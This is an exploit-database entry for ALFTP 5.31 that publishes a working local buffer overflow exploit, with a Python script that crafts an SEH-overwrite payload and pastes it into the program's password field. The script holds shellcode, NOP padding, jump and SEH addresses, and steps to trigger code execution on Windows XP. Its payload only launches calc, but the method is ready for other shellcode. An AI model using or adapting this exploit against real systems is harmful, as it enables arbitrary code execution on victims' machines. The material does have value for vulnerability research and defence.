ALFTP 5.31 Local Buffer Overflow (SEH Bypass)

2018.05.28

Credit: Gokul Babu

Risk: High

Local: Yes

Remote: No

CVE: N/A

CWE: CWE-119

# Exploit Title: ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)
# Exploit Author: Gokul Babu
# Vendor Homepage: http://www.altools.com/downloads/alftp.aspx
# Vulnerable Software: http://advert.estsoft.com/?event=201001127730323
# Tested on: Windows XP Professional SP3 -Version-2002
# Steps to reproduce-1: (eip overwrite-88-windows-XP)
# Paste the contents of alftp.txt in 'options->Preference->Security->New password &Confirm password'
#seh- 0041A6EF "\xEF\xA6\x41"
#address to jump 0012FA7A
#nseh- "\xEB\xAC\x90\x90"
#winexec address 0x7c862aed
#!/usr/bin/python
shellcode=("\x33\xC0"
"\x50"
"\x68\x63\x61\x6C\x63"
"\x8B\xC4"
"\x50"
"\xE8\x61\x30\x73\x7C")
buf="\x90"*4 + shellcode + "\x90"*(80-len(shellcode)) + "\xEB\xAC\x90\x90" + "\xEF\xA6\x41"
f=open("alftp.txt","w")
f.write(buf)
f.close()

See this note in RAW Version

Vote for this issue:

33%

67%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ALFTP 5.31 Local Buffer Overflow (SEH Bypass)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.